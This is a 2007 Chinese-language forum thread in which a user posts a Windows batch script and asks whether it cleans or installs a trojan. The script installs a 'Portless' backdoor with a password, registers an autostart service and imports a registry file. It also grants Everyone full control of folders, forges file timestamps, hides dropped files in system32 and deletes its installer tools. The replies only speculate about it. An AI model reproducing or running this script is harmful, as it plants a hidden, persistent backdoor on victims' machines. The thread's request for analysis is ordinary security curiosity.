sfqy9907 - 2007-3-10 14:18:00
@echo off
cd %systemroot%\system32
gzsha.exe
echo ---Trojan has been cleaned up successfully---
AbbyS.exe
echo ---Trojan has been setup successfully---
%systemroot%\system32\instexnt.exe install
echo ---AutoExNt has been setup successfully---
%systemroot%\system32\PortlessInst.exe -install Isdnttlab xfi2lwr
echo ---Portless has been setup successfully---
%systemroot%\system32\PortlessInst.exe -set Isdnttlab xfi2lwr
echo ---Portless' password has been changed successfully---
echo pskill svohost>%systemroot%\system32\c.bat
echo net1 stop autoexnt>>%systemroot%\system32\c.bat
echo net1 start autoexnt>>%systemroot%\system32\c.bat
md %systemroot%\debug\$NtUninstallKB64666$
sleep 3
copy autoexnt.bat autoexnt.bak
echo regedit /s s.reg>autoexnt.bat
net1 start autoexnt
sleep 5
del autoexnt.bat
ren autoexnt.bak autoexnt.bat
echo ---Reg has been fixed successfully---
%systemroot%\system32\net1.exe start iprip
echo y|cacls autoexnt.bat /G EVERYONE:F
echo y|cacls %systemroot%\debug /G EVERYONE:F
echo y|cacls %systemroot%\debug\$NtUninstallKB64666$ /G EVERYONE:F
abby -touch %systemroot%\system32\psu.exe
abby -touch %systemroot%\system32\abby2.exe
abby -touch %systemroot%\system32\svchostdll.dll
abby -touch %systemroot%\system32\autoexnt.exe
abby -touch %systemroot%\system32\autoexnt.bat
abby -touch %systemroot%\system32\servmess.dll
abby -touch %systemroot%\system32\pskill.exe
abby -touch %systemroot%\system32\sleep.exe
echo ---Files has been touched successfully---
echo ---Portless has been started successfully---
attrib +s +h %systemroot%\system32\psu.exe
attrib +s +h %systemroot%\system32\abby.exe
attrib +s +h %systemroot%\system32\abby2.exe
attrib +s +h %systemroot%\system32\svchostdll.dll
attrib +s +h %systemroot%\system32\autoexnt.exe
attrib +s +h %systemroot%\system32\autoexnt.bat
attrib +s +h %systemroot%\system32\servmess.dll
attrib +s +h %systemroot%\system32\pskill.exe
attrib +s +h %systemroot%\system32\sleep.exe
attrib +s +h %systemroot%\system32\c.bat
echo ---Files has been hidden successfully---
autoruns.exe
pause
del %systemroot%\system32\instexnt.exe /Q /F
del %systemroot%\system32\PortlessInst.exe /Q /F
del %systemroot%\system32\ixinst.bat /Q /F
del %systemroot%\system32\gzsha.exe /Q /F
del %systemroot%\system32\autoruns.exe /Q /F
del %systemroot%\system32\k.exe /Q /F
del %systemroot%\system32\s.reg /Q /F
newcenturymoon - 2007-3-10 14:22:00
貌似是 清除某个木马的批处理
sfqy9907 - 2007-3-10 16:05:00
不是吧?
应该是个建立木马的东西我觉得..
不知道哪个高手有耐心给详细分析一下..
logicl - 2007-3-10 16:28:00
好奇..顶一下.
© 2000 - 2026 Rising Corp. Ltd.